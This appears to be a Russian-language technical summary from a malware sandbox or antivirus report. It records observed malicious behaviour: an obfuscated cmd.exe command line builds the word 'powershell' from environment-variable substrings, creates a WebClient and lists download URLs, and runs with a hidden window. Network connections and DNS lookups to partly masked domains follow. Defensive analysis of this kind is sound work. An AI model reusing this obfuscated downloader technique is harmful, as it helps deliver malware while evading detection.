Техническая информация
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Handmade42='Polarised79';$payment12=new-object Net.WebClient;$Causeway58='http://ko###door.com/PbEu786@http://www.antique-carpets.com/PIp...
- 'ad###llorca.org':80
- DNS ASK ko###door.com
- DNS ASK an####e-carpets.com
- DNS ASK bu###mecare.net
- DNS ASK ad###llorca.org
- DNS ASK ky###gtuhoc.com
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Handmade42='Polarised79';$payment12=new-object Net.WebClient;$Causeway58='http://ko###door.com/PbEu786@http://www.antique-carpets.com/PIp...' (со скрытым окном)